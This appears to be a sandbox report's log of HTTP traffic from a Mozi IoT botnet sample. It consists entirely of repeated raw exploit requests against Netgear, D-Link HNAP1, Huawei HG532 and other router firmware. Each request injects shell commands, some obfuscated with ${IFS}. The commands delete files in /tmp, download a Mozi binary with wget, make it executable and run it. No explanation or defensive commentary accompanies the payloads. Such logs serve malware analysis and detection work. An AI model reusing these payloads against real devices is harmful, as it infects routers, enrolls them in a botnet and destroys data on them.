                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 85.36.32.17:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 143.101.55.97:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 33.11.207.173:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 215.161.47.220:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 91.191.108.134:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 184.242.24.210:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 68.175.16.144:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
